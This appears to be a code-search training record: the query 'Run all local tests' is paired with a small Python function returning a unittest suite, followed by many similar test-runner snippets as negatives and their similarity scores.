TestResult(test_method)\n test_method.im_self.test_result = result\n\n try:\n self._method_level = True # Flag that we're currently running method-level stuff (rather than class-level)\n\n # run \"on-run\" callbacks. eg/ print out the test method name\n for callback in self.__callbacks[self.EVENT_ON_RUN_TEST_METHOD]:\n callback(result.to_dict())\n result.start()\n\n if self.__class_level_failure:\n result.end_in_failure(self.__class_level_failure)\n elif self.__class_level_error:\n result.end_in_error(self.__class_level_error)\n else:\n # first, run setup fixtures\n self._stage = self.STAGE_SETUP\n def _setup_block():\n for fixture_method in self.setup_fixtures + [ self.setUp ]:\n fixture_method()\n self.__execute_block_recording_exceptions(_setup_block, result)\n\n def _run_test_block():\n # then run the test method itself, assuming setup was successful\n self._stage = self.STAGE_TEST_METHOD\n if not result.complete:\n self.__execute_block_recording_exceptions(test_method, result)\n\n def _setup_teardown_block():\n self.__enter_context_managers(self.setup_teardown_fixtures, _run_test_block)\n\n # then run any setup_teardown fixtures, assuming setup was successful.\n if not result.complete:\n self.__execute_block_recording_exceptions(_setup_teardown_block, result)\n\n # finally, run the teardown phase\n self._stage = self.STAGE_TEARDOWN\n def _teardown_block():\n for fixture_method in [ self.tearDown ] + self.teardown_fixtures:\n fixture_method()\n self.__execute_block_recording_exceptions(_teardown_block, result)\n\n # if nothing's gone wrong, it's not about to start\n if not result.complete:\n result.end_in_success()\n except (KeyboardInterrupt, SystemExit):\n result.end_in_interruption(sys.exc_info())\n raise\n finally:\n for callback in self.__callbacks[self.EVENT_ON_COMPLETE_TEST_METHOD]:\n callback(result.to_dict())\n\n self._method_level = False\n\n if not result.success:\n self.failure_count += 1\n if self.failure_limit and self.failure_count >= self.failure_limit:\n return", "def test_standard_tap_tests():\n tests = get_standard_tap_tests(TapPartoo, config=SAMPLE_CONFIG)\n for test in tests:\n test()", "def run_tests():\n testfiles = ['tests.test_overall']\n exclude = ['__init__.py', 'test_overall.py']\n for t in glob(pjoin('tests', '*.py')):\n if True not in 
[t.endswith(ex) for ex in exclude]:\n if basename(t).startswith('test_'):\n testfiles.append('tests.%s' % splitext(basename(t))[0])\n\n suites = []\n for file in testfiles:\n __import__(file)\n suites.append(sys.modules[file].suite)\n\n tests = unittest.TestSuite(suites)\n runner = unittest.TextTestRunner(verbosity=2)\n\n # Disable logging output\n logging.basicConfig(level=100)\n logging.disable(100)\n\n result = runner.run(tests)\n return result", "def run_all_unit_tests():\n original = verify.parse_content\n try:\n verify.parse_content = parse_string_in_scope\n\n test_list_of()\n\n test_activity_multiple_choice()\n test_activity_free_text()\n test_activity_multiple_choice_group()\n test_activity_ast()\n\n test_assessment()\n test_assessment_ast()\n\n # test existing verifier using parsing instead of exec/compile\n verify.test_sample_assets()\n finally:\n verify.parse_content = original", "def RunTest(self):\n self.TestLs()\n self.TestTerminate()\n self.TestMultipleProcesses()", "def runall():\n sclogic.runall()", "def unittest():\n from a6test import test_all\n test_all()", "def test_catchall():\n\n dispatcher = ntelebot.dispatch.Dispatcher()\n dispatcher.add(lambda ctx: 'DISPATCHED')\n ctx = MockContext()\n assert dispatcher(ctx) == 'DISPATCHED'", "def spec_tests():\n pass", "def run_tests(self):\n manifest = manifestparser.TestManifest(\n manifests=[os.path.join(self.repository_path, self.manifest_path)],\n strict=False)\n\n tests = manifest.active_tests(**mozinfo.info)\n self._mozmill.run(tests, self.options.restart)\n\n # Whenever a test fails it has to be marked, so we quit with the correct exit code\n self.last_failed_tests = self.last_failed_tests or self._mozmill.results.fails\n\n self.testrun_index += 1", "def do_test(self):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tif not self.build['dotest']:\n\t\t\tself.log('Tests configured off, not running',level=logging.DEBUG)\n\t\t\treturn\n\t\t# Test in reverse order\n\t\tself.log('PHASE: test', level=logging.DEBUG)\n\t\tself.stop_all()\n\t\tself.start_all()\n\t\tfor module_id in self.module_ids(rev=True):\n\t\t\t# Only test if it's installed.\n\t\t\tif self.is_installed(self.shutit_map[module_id]):\n\t\t\t\tself.log('RUNNING TEST ON: ' + module_id, level=logging.DEBUG)\n\t\t\t\tself.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\tif not self.shutit_map[module_id].test(self):\n\t\t\t\t\tself.fail(module_id + ' failed on test', shutit_pexpect_child=self.get_shutit_pexpect_session_from_id('target_child').pexpect_child) # pragma: no cover\n\t\t\t\tself.logout(echo=False)", "def _do_test(self):\n\n process_all_events()\n\n if self.list:\n (callback, args, kwargs) = self.list.pop(0)\n callback(*args, **kwargs)\n else:\n safe_exit(force=1)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_run_all_some_rule_triggered(self, *args):\n rule1 = {\n 'conditions': 'condition1',\n 'actions': 'action name 1'\n }\n rule2 = {\n 'conditions': 'condition2',\n 'actions': 'action name 2'\n }\n variables = BaseVariables()\n actions = BaseActions()\n\n def return_action1(rule, *args, **kwargs):\n return rule['actions'] == 'action name 1'\n\n engine.run.side_effect = return_action1\n\n result = engine.run_all([rule1, rule2], variables, actions)\n self.assertTrue(result)\n self.assertEqual(engine.run.call_count, 2)\n\n # switch order and try again\n engine.run.reset_mock()\n\n 
result = engine.run_all([rule2, rule1], variables, actions)\n self.assertTrue(result)\n self.assertEqual(engine.run.call_count, 2)", "def test():\n import unittest\n tests = unittest.TestLoader().discover(tests)\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_dispatch(self):\n disp = Dispatcher()\n args = (1, 2)\n res = disp.dispatch(\"working\", *args)\n self.assertEqual(res, args)", "def run_feature_extraction_tests():\n test_feature_extraction()\n test_distributed_feature_extraction()\n test_multimodel_feature_extraction()\n test_distributed_multimodel_feature_extraction()", "def main():\n run_test_summary1a()\n run_test_summary1c()\n run_test_summary1c()", "def run_suite(*test_classes):\n\n loader = unittest.TestLoader()\n suite = unittest.TestSuite()\n for test_class in test_classes:\n tests = loader.loadTestsFromTestCase(test_class)\n suite.addTests(tests)\n if suite is not None:\n unittest.TextTestRunner(verbosity=2).run(suite)\n return", "def run_test_suites(self, suites):\n for suite_class in suites:\n test_suite = suite_class(self)\n results = test_suite.run()\n self.test_results += results", "def run_combined(self):\n self.runtest_autokey()\n self.runtest_mediaresource()\n self.runtest_composite_slug()\n self.runtest_all_types()\n self.runtest_complex_types()\n self.runtest_only_key()\n self.runtest_compound_key()\n self.runtest_simple_select()\n self.runtest_paging()\n self.runtest_nav_o2o()\n self.runtest_nav_o2o_1()\n self.runtest_nav_zo2o()\n self.runtest_nav_zo2o_f()\n self.runtest_nav_zo2o_b()\n self.runtest_nav_many2o()\n self.runtest_nav_many2o_f()\n self.runtest_nav_many2o_b()\n self.runtest_nav_many2zo()\n self.runtest_nav_many2zo_f()\n self.runtest_nav_many2zo_b()\n self.runtest_nav_many2zo_r()\n self.runtest_nav_many2zo_rf()\n self.runtest_nav_many2zo_rb()\n self.runtest_nav_many2many()\n self.runtest_nav_many2many_1()\n self.runtest_nav_many2many_r()\n self.runtest_nav_many2many_r1()", "def startTestRun(self):", "def run(self):\n list_test_scenarios = self.__get_list_scenarios_in_folder()\n\n if not list_test_scenarios:\n utils.print_error(\n \"\\n{}\\n\".format(constant.ERR_CANNOT_FIND_ANY_TEST_SCENARIOS))\n exit(1)\n\n (tests_pass, tests_fail) = self.__execute_tests(list_test_scenarios)\n\n complete_message = constant.INFO_TEST_PASS_FAIL.format(\n tests_pass, tests_fail)\n\n print(complete_message)\n\n self.__execute_reporter()", "def test():\n import unittest\n testmodules = [\n 'bettermathlib_tests',\n 'randomwebapp_tests',\n ]\n suite = unittest.TestSuite()\n for t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\n unittest.TextTestRunner(verbosity=2).run(suite)", "def test_actions(self, actions):\n try:\n for action in actions:\n self.get_action(action['type'])(**action)\n except Exception as e:\n print('Exception: {}'.format(str(e)))", "def run(self):\n\n self.__run_class_setup_fixtures()\n self.__enter_context_managers(self.class_setup_teardown_fixtures, self.__run_test_methods)\n self.__run_class_teardown_fixtures()", "def _run_local_tests(self, *args, **kwargs):\n pass", "def test():\n test_app()\n test_pagebrowser()", "def test(self):\n for arch, python in self.python:\n self.run(f\"{python} -m pytest\")", "def run_tests(self):\n # Charm does not defer hooks so that test is not included.\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'ovn-central',\n 'ovn-central')", "def run_tests(self):\n\n self.endurance_results = []\n self._mozmill.add_listener(self.endurance_event, 
eventType='mozmill.enduranceResults')\n self._mozmill.persisted['endurance'] = {'delay': self.delay,\n 'iterations': self.options.iterations,\n 'entities': self.options.entities,\n 'restart': self.options.restart}\n\n self.manifest_path = os.path.join('tests', 'endurance')\n if not self.options.reserved:\n self.manifest_path = os.path.join(self.manifest_path,\n \"manifest.ini\")\n else:\n self.manifest_path = os.path.join(self.manifest_path,\n 'reserved',\n self.options.reserved + \".ini\")\n TestRun.run_tests(self)", "def run_tests(self, cov, functionsToRun): # pragma: nested\n print(\"runed cases\")\n for context in functionsToRun:\n #print(context)\n info = context.split(\".\")\n suite_name =info[0]\n #print(suite_name)\n className = info[1]\n caseName = info[2]\n cov.start()\n suite = import_local_file(suite_name)\n #print(dir(suite))\n try:\n # Call all functions in this module\n for name in dir(suite):\n variable = getattr(suite, name)\n #print(\"variable.__name__\")\n #print(variable.__name__)\n if inspect.isclass(variable) and variable.__name__== className:\n obj = variable()\n \n memberNames = inspect.getmembers(variable,inspect.isfunction)\n \n for member in memberNames:\n if member[0].startswith('test_') and member[0] == caseName:\n \n print(context)\n getattr(obj, member[0])()\n #if inspect.isfunction(variable):\n # variable()\n finally:\n cov.stop()", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' 
% member[0], end='')\n member[1](master=True)\n print('done!')", "def test_basic_execution(self):", "def run_test(self):\n raise NotImplementedError", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_all_circuit_types(self):\n for circuit_type in self.circuits:\n\n # Create a subTest for each type of circuit\n with self.subTest(circuit_type=circuit_type):\n self.check_circuit_type(circuit_type)", "def execute_tests():\n\n if len(sys.argv) > 1:\n # Filter test list based on command line requests\n tests_to_run = []\n for requested in sys.argv[1:]:\n for func, param in registered_tests:\n if param == requested:\n tests_to_run += [(func, param)]\n break\n else:\n print('Unknown test ' + requested)\n sys.exit(1)\n else:\n tests_to_run = registered_tests\n\n failing_tests = []\n for func, param in tests_to_run:\n print(param + (' ' * (OUTPUT_ALIGN - len(param))), end='')\n sys.stdout.flush()\n try:\n func(param)\n print(COLOR_GREEN + 'PASS' + COLOR_NONE)\n except KeyboardInterrupt:\n sys.exit(1)\n except TestException as exc:\n print(COLOR_RED + 'FAIL' + COLOR_NONE)\n failing_tests += [(param, exc.args[0])]\n except Exception as exc: # pylint: disable=W0703\n print(COLOR_RED + 'FAIL' + COLOR_NONE)\n failing_tests += [(param, 'Test threw exception:\\n' +\n traceback.format_exc())]\n\n if failing_tests:\n print('Failing tests:')\n for name, output in failing_tests:\n print(name)\n print(output)\n\n print(str(len(failing_tests)) + '/' +\n str(len(tests_to_run)) + ' tests failed')\n if failing_tests != []:\n sys.exit(1)", "def run_tests():\n fail = []\n okay = []\n for i in os.listdir(\".\"):\n if i.find(\"_test_\") > -1 and i.endswith(\".py\"):\n if 0 != subprocess.call(\"python \" + i, shell=True):\n fail.append(i)\n else:\n okay.append(i)\n if fail:\n print(\"[ERROR] The following %u tests failed: %r\" % (len(fail), fail))\n return False\n print(\"[DONE] All %u tests completely successfully!\" % (len(okay)))\n return True", "def main():\n test_merge_quick_sort()\n test_compare()", "def test_dispatch_all0(self):\n req1 = FakeRequest(1, False)\n req2 = FakeRequest(2, False)\n req3 = FakeRequest(3, False)\n req4 = FakeRequest(4, False)\n req5 = FakeRequest(5, False)\n\n self.request_buffer.append(req1)\n self.request_buffer.append(req2)\n self.request_buffer.append(req3)\n self.request_buffer.append(req4)\n self.request_buffer.append(req5)\n\n self.request_buffer.dispatch_all()\n\n self.assertEqual(\n [True]*5,\n [req.dispatched for req in self.request_buffer.requests]\n )", "def run_all_tests():\n successes = 0\n testsrun = 0\n testsdir = tests_dirpath()\n for test in os.listdir(testsdir):\n path = os.path.join(testsdir, test)\n if os.path.isdir(path):\n testsrun += 1\n if run_test(path):\n successes += 1\n print(\"--- %d/%d TESTS PASSED ---\" % (successes, testsrun))\n return successes == testsrun", "def run_tests(self):\n\n self.test_report = []\n\n #dict of unsorted lists\n dict_of_un_lists = self.dict_un_lists_intersection_test(self.data_dict)\n self.test_report.append(dict_of_un_lists)\n\n #dict of sets\n dict_of_sets = self.build_dict_of_sets(self.data_dict)\n 
self.test_report.append(self.dict_sets_intersection_test(dict_of_sets))\n\n #pandas - experimental and probably not the way to use pandas\n # dict_of_pandas = self.build_dict_of_panda_series(self.data_dict)\n # self.test_report.append(self.dicts_any_intersection_node_test(dict_of_pandas))\n\n # print results\n\n if self.verbose:\n self.print_tests_results()", "def do_test():\n for x in execute_helper(test_info,crossmap_tests):\n yield x", "def runTest(self):\n self.setUp()\n self.test_BiplaneRegistration1()", "def run_tests(self):\n # Trigger a config change which triggers a deferred hook.\n self.run_charm_change_hook_test('configure_ovs')\n\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'openvswitch-switch',\n 'openvswitch-switch')", "def run_tests(self):\n # Trigger a config change which triggers a deferred hook.\n self.run_charm_change_hook_test('configure_ovs')\n\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'openvswitch-switch',\n 'openvswitch-switch')", "def run(self, args):\n start_time = time.time()\n self._printer.write_update('Collecting tests ...')\n running_all_tests = False\n\n try:\n paths, all_test_names, running_all_tests = self._collect_tests(\n args)\n except IOError:\n # This is raised if --test-list doesn't exist\n return test_run_results.RunDetails(\n exit_code=exit_codes.NO_TESTS_EXIT_STATUS)\n\n test_names = self._finder.split_into_chunks(all_test_names)\n if self._options.order == 'natural':\n test_names.sort(key=self._port.test_key)\n elif self._options.order == 'random':\n test_names.sort()\n random.Random(self._options.seed).shuffle(test_names)\n elif self._options.order == 'none':\n # Restore the test order to user specified order.\n # base.tests() may change the order as it returns tests in the\n # real, external/wpt, virtual order.\n if paths:\n test_names = self._restore_order(paths, test_names)\n\n if not self._options.no_expectations:\n self._printer.write_update('Parsing expectations ...')\n self._expectations = test_expectations.TestExpectations(self._port)\n\n tests_to_run, tests_to_skip = self._prepare_lists(paths, test_names)\n\n self._printer.print_found(\n len(all_test_names), len(test_names), len(tests_to_run),\n self._options.repeat_each, self._options.iterations)\n\n # Check to make sure we're not skipping every test.\n if not tests_to_run:\n msg = 'No tests to run.'\n if self._options.zero_tests_executed_ok:\n _log.info(msg)\n # Keep executing to produce valid (but empty) results.\n else:\n _log.critical(msg)\n code = exit_codes.NO_TESTS_EXIT_STATUS\n return test_run_results.RunDetails(exit_code=code)\n\n exit_code = self._set_up_run(tests_to_run)\n if exit_code:\n return test_run_results.RunDetails(exit_code=exit_code)\n\n if self._options.num_retries is None:\n # If --test-list is passed, or if no test narrowing is specified,\n # default to 3 retries. Otherwise [e.g. 
if tests are being passed by\n # name], default to 0 retries.\n if self._options.test_list or len(paths) < len(test_names):\n self._options.num_retries = 3\n else:\n self._options.num_retries = 0\n\n should_retry_failures = self._options.num_retries > 0\n\n try:\n self._register_termination_handler()\n self._start_servers(tests_to_run)\n if self._options.watch:\n run_results = self._run_test_loop(tests_to_run, tests_to_skip)\n else:\n run_results = self._run_test_once(tests_to_run, tests_to_skip,\n should_retry_failures)\n initial_results, all_retry_results = run_results\n finally:\n _log.info(\"Finally stop servers and clean up\")\n self._stop_servers()\n self._clean_up_run()\n\n if self._options.no_expectations:\n return test_run_results.RunDetails(0, [], [], initial_results,\n all_retry_results)\n\n # Some crash logs can take a long time to be written out so look\n # for new logs after the test run finishes.\n self._printer.write_update('Looking for new crash logs ...')\n self._look_for_new_crash_logs(initial_results, start_time)\n for retry_attempt_results in all_retry_results:\n self._look_for_new_crash_logs(retry_attempt_results, start_time)\n\n self._printer.write_update('Summarizing results ...')\n summarized_full_results = test_run_results.summarize_results(\n self._port, self._options, self._expectations, initial_results,\n all_retry_results)\n summarized_failing_results = test_run_results.summarize_results(\n self._port,\n self._options,\n self._expectations,\n initial_results,\n all_retry_results,\n only_include_failing=True)\n run_histories = test_run_results.test_run_histories(\n self._options, self._expectations, initial_results,\n all_retry_results)\n\n exit_code = summarized_failing_results['num_regressions']\n if exit_code > exit_codes.MAX_FAILURES_EXIT_STATUS:\n _log.warning('num regressions (%d) exceeds max exit status (%d)',\n exit_code, exit_codes.MAX_FAILURES_EXIT_STATUS)\n exit_code = exit_codes.MAX_FAILURES_EXIT_STATUS\n\n if not self._options.dry_run:\n self._write_json_files(summarized_full_results,\n summarized_failing_results, initial_results,\n running_all_tests, run_histories)\n\n self._copy_results_html_file(self._artifacts_directory,\n 'results.html')\n if (initial_results.interrupt_reason is\n test_run_results.InterruptReason.EXTERNAL_SIGNAL):\n exit_code = exit_codes.INTERRUPTED_EXIT_STATUS\n else:\n if initial_results.interrupted:\n exit_code = exit_codes.EARLY_EXIT_STATUS\n if (self._options.show_results\n and (exit_code or initial_results.total_failures)):\n self._port.show_results_html_file(\n self._filesystem.join(self._artifacts_directory,\n 'results.html'))\n self._printer.print_results(time.time() - start_time,\n initial_results)\n\n return test_run_results.RunDetails(exit_code, summarized_full_results,\n summarized_failing_results,\n initial_results, all_retry_results)", "def test_dispatch(self):\r\n self.hit = False\r\n\r\n def handler(event):\r\n self.hit = True\r\n\r\n self.events.register(handler, TestEvent)\r\n \r\n self.events.dispatch(TestEvent())\r\n\r\n self.assertTrue(self.hit)", "def init(self):\n \n self._nc_session = TestBedTests.TBNetconfSession(self.log, self.loop)\n self._nc_proxy = TestBedTests.TBNetconfProxy(self._nc_session, UtCompositeYang, self.log)\n self._netconf_test_objects = []\n self._pbreq_test_objects = []\n\n for cls in NETCONF_TESTS:\n obj = cls(self._dts, self.log, self._nc_proxy, self._loop)\n yield from obj.dts_self_register()\n self._netconf_test_objects.append(obj)\n\n for cls in PBREQ_TESTS:\n obj = 
cls(self._dts, self.log, self._nc_proxy, self._loop)\n yield from obj.dts_self_register()\n self._pbreq_test_objects.append(obj)\n\n @asyncio.coroutine\n def run_all_tests(xact_info, action, ks_path, msg):\n ro1 = yield from self.run_tests(self._netconf_test_objects, msg.continue_on_failure)\n if ro1.failed_count is 0 or msg.continue_on_failure is True:\n ro2 = yield from self.run_tests(self._pbreq_test_objects, msg.continue_on_failure)\n\n ro = RwAgentTestbedYang.AgentTestsOp()\n ro.total_tests = ro1.total_tests + ro2.total_tests\n ro.passed_count = ro1.passed_count + ro2.passed_count\n ro.failed_count = ro1.failed_count + ro2.failed_count\n #ro.failed_tests = ro1.failed_tests + ro2.failed_tests\n\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n\n @asyncio.coroutine\n def run_all_netconf_tests(xact_info, action, ks_path, msg):\n ro = yield from self.run_tests(self._netconf_test_objects)\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n\n @asyncio.coroutine\n def run_all_pbreqs_tests(xact_info, action, ks_path, msg):\n ro = yield from self.run_tests(self._pbreq_test_objects)\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n \n # Register for all test-cases\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_tests))\n\n # Register for per category all test-cases\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:netconf-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_netconf_tests))\n\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:pb-request-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_pbreqs_tests))", "def CASE10( self, main ):\n import time\n from tests.CHOTestMonkey.dependencies.events.Event import EventType\n from tests.CHOTestMonkey.dependencies.EventScheduler import EventScheduleMethod\n\n main.log.report( \"Run all enabled checks\" )\n main.log.report( \"__________________________________________________\" )\n main.case( \"Run all enabled checks\" )\n main.step( \"Run all enabled checks\" )\n main.caseResult = main.TRUE\n main.eventGenerator.triggerEvent( EventType().CHECK_ALL, EventScheduleMethod().RUN_BLOCK )\n # Wait for the scheduler to become idle before going to the next testcase\n with main.eventScheduler.idleCondition:\n while not main.eventScheduler.isIdle():\n main.eventScheduler.idleCondition.wait()\n utilities.assert_equals( expect=main.TRUE,\n actual=main.caseResult,\n onpass=\"All enabled checks passed\",\n onfail=\"Not all enabled checks passed\" )\n time.sleep( main.caseSleep )", "def run_test_cases(self):\n count = 1\n for test_case in self.test_cases:\n print(\"Running test case #%d\" % count)\n if test_case.name == 'RouteDistance':\n distance = self.get_distance_for_route(test_case.args)\n print('%s distance: %s' % (test_case.args, distance))\n elif test_case.name == 'RouteShortest':\n args = test_case.args.split('|')\n shortest_distance = self.find_shortest_path_between_cities(args[0], args[1])\n print(\"Shortest distance between %s and %s: %d\" % (args[0], args[1], shortest_distance))\n elif test_case.name == 'RouteLessThanHops':\n args = test_case.args.split('|')\n paths = self.trips_hop_constraint_bfs(args[0], 
args[1], int(args[2]))\n print('Paths between %s and %s with hops less than or equal to %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n elif test_case.name == 'RouteEqualHops':\n args = test_case.args.split('|')\n paths = self.trips_hop_constraint_bfs(args[0], args[1], int(args[2]), equal=True)\n print('Paths between %s and %s with hops equal to %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n elif test_case.name == 'RouteLessThanDistance':\n args = test_case.args.split('|')\n paths = self.trips_distance_constraint_bfs(args[0], args[1], int(args[2]))\n print('Paths between %s and %s with distance less than %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n else:\n raise Exception('Unknown test case: %s' % test_case.name)\n count += 1\n print()", "def test_after_jam_step_two(self):\n for test_suite_class in self.jam_step_2_test_suite_list:\n test_suite = test_suite_class(self)\n results = test_suite.run()\n self.test_results += results", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)" ]
[ "0.7445618", "0.72676694", "0.72357136", "0.69886786", "0.69496655", "0.69481313", "0.6913679", "0.6835688", "0.6833541", "0.68203133", "0.68139446", "0.6779515", "0.67011243", "0.6626831", "0.66243935", "0.6614983", "0.65842265", "0.6561729", "0.6560582", "0.6522628", "0.6487395", "0.6441573", "0.6411267", "0.6393447", "0.6377413", "0.6375661", "0.635919", "0.6357565", "0.6333101", "0.6329656", "0.6311414", "0.62818956", "0.6278038", "0.6248356", "0.62319", "0.6221192", "0.6200442", "0.6184826", "0.6169045", "0.6164405", "0.61500186", "0.614703", "0.61333734", "0.613047", "0.6121119", "0.61183864", "0.6113423", "0.6111994", "0.6102002", "0.6094369", "0.60917616", "0.60893476", "0.608665", "0.60725355", "0.60693014", "0.60576034", "0.60570395", "0.6048917", "0.60480064", "0.6047662", "0.6036021", "0.6026652", "0.60247463", "0.6018374", "0.6010244", "0.6003191", "0.59893966", "0.5970744", "0.596313", "0.5961926", "0.59518117", "0.59466994", "0.59456545", "0.5942728", "0.5928756", "0.5928756", "0.5921319", "0.5914724", "0.59079313", "0.5892017", "0.5892017", "0.5892017", "0.5891779", "0.5876384", "0.5874596", "0.5873433", "0.5865875", "0.58601546", "0.5856308", "0.5856233", "0.58452326", "0.5844174", "0.5844174", "0.5843423", "0.5841481", "0.5830591", "0.58252394", "0.5821749", "0.5819941", "0.5819165" ]
0.7137783
3
Run all local tests
def local(): suite = ServiceTestSuite() suite.addTest(unittest.makeSuite(Test, 'test_local')) return suite
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _run_local_tests(self, *args, **kwargs):\n pass", "def runAll():\n\n loader = unittest.TestLoader()\n test_dir = pkg_resources.resource_filename('frvcpy.test','.')\n suite = loader.discover(test_dir)\n\n runner = unittest.TextTestRunner(verbosity=2)\n runner.run(suite)", "def main():\n run_test_all()", "def tests():\n api.local('nosetests')", "def runalltests():\n doctest.testmod()", "def run_test_suite():\n local('. fabric_factory/ve/bin/activate; fabric_factory/src/project/manage.py test')", "def runTests(self):\n \n pass", "def run_all_tests():\n remove_dbs()\n run_training_tests()\n run_custom_training_tests()\n run_training_save_tests()\n run_validation_tests()\n run_feature_extraction_tests()", "def test(self):\n for arch, python in self.python:\n self.run(f\"{python} -m pytest\")", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'remote',\n 'manifest.ini')\n TestRun.run_tests(self)", "def run_all_tests(self):\n for index in range(len(self.__test_set_list)):\n self.run_test(index)", "def run_all_unit_tests(cls):\n suites_list = []\n for test_class in cls.TESTS:\n suite = unittest.TestLoader().loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n result = unittest.TextTestRunner().run(unittest.TestSuite(suites_list))\n if not result.wasSuccessful() or result.errors:\n raise Exception(result)", "def local_test():\n pass", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'functional',\n 'manifest.ini')\n TestRun.run_tests(self)", "def test_all():\n test_get_to()\n test_error_type()\n test_exchange()\n print(\"All tests passed.\")", "def RunTestAll(ss):\n ss.StopNow = False\n ss.TestAll()\n ss.Stopped()", "def run():\n\tsubsuite_list = []\n\tfor _, modname, _ in pkgutil.iter_modules(test.__path__):\n\t\tif modname.startswith(\"test_\"):\n\t\t\tmodule = importlib.import_module('test.' 
+ modname)\n\t\t\tsubsuite = unittest.TestLoader().loadTestsFromModule(module)\n\t\t\tsubsuite_list.append(subsuite)\n\tsuite = unittest.TestSuite(subsuite_list)\n\n\tprint(\"Testing:\\n\")\n\tunittest.TextTestRunner(verbosity=2).run(suite)", "def runtests():\n #- Load all TestCase classes from desistar/test/test_*.py\n tests = desistar_test_suite()\n #- Run them\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_tests():\n testfiles = ['tests.test_overall']\n exclude = ['__init__.py', 'test_overall.py']\n for t in glob(pjoin('tests', '*.py')):\n if True not in [t.endswith(ex) for ex in exclude]:\n if basename(t).startswith('test_'):\n testfiles.append('tests.%s' % splitext(basename(t))[0])\n\n suites = []\n for file in testfiles:\n __import__(file)\n suites.append(sys.modules[file].suite)\n\n tests = unittest.TestSuite(suites)\n runner = unittest.TextTestRunner(verbosity=2)\n\n # Disable logging output\n logging.basicConfig(level=100)\n logging.disable(100)\n\n result = runner.run(tests)\n return result", "def run_tests():\n fail = []\n okay = []\n for i in os.listdir(\".\"):\n if i.find(\"_test_\") > -1 and i.endswith(\".py\"):\n if 0 != subprocess.call(\"python \" + i, shell=True):\n fail.append(i)\n else:\n okay.append(i)\n if fail:\n print(\"[ERROR] The following %u tests failed: %r\" % (len(fail), fail))\n return False\n print(\"[DONE] All %u tests completely successfully!\" % (len(okay)))\n return True", "def run_all_tests(self) -> None:\n self.run_trt_precision_tests()\n logging.info(\"Check analysis result at: %s\", self._output_dir)", "def tests():", "def test():\n for cmd in [\n \"pytest --verbose --cov pike/ --cov-report term --cov-report html tests/\",\n ]:\n _run_in_venv(shlex.split(cmd))\n for linter in [[\"black\", \"--check\"], [\"flake8\"], [\"isort\", \"--check\"]]:\n _run_in_venv(linter + TEST_FILES)\n\n _run_in_venv(\n [\"mypy\", \"pike/\", \"tests/\", \"setup.py\", \"pikefile.py\", \"--show-error-codes\"]\n )\n _run_in_venv([\"mypy\", \"examples/\"])\n _run_in_venv([\"bandit\", \"-r\", \"pike/\"])", "def _run_ci_test():\n _run_install(False)\n _run_coverage_html(False)\n _run_typecheck_xml(False)\n _run_lint(True)", "def runtests(ctx):\n run('pytest -s tests', pty=pty_available)\n run('flake8 --ignore E265,E266,E501 --exclude src, lib', pty=pty_available)", "def doAllTests(self):\n # Initial offset\n self.getAlertsFile()\n self.offset = self.getOffset(self.config.get('PATHS', 'tempfile'))\n\n # Do all tests\n # As the socket is not persistent, client side attacks have to be done before all tests\n for module in self.modules:\n # Test is performed only if selected in config.cfg\n if self.config.get('TESTS', module[1]) == 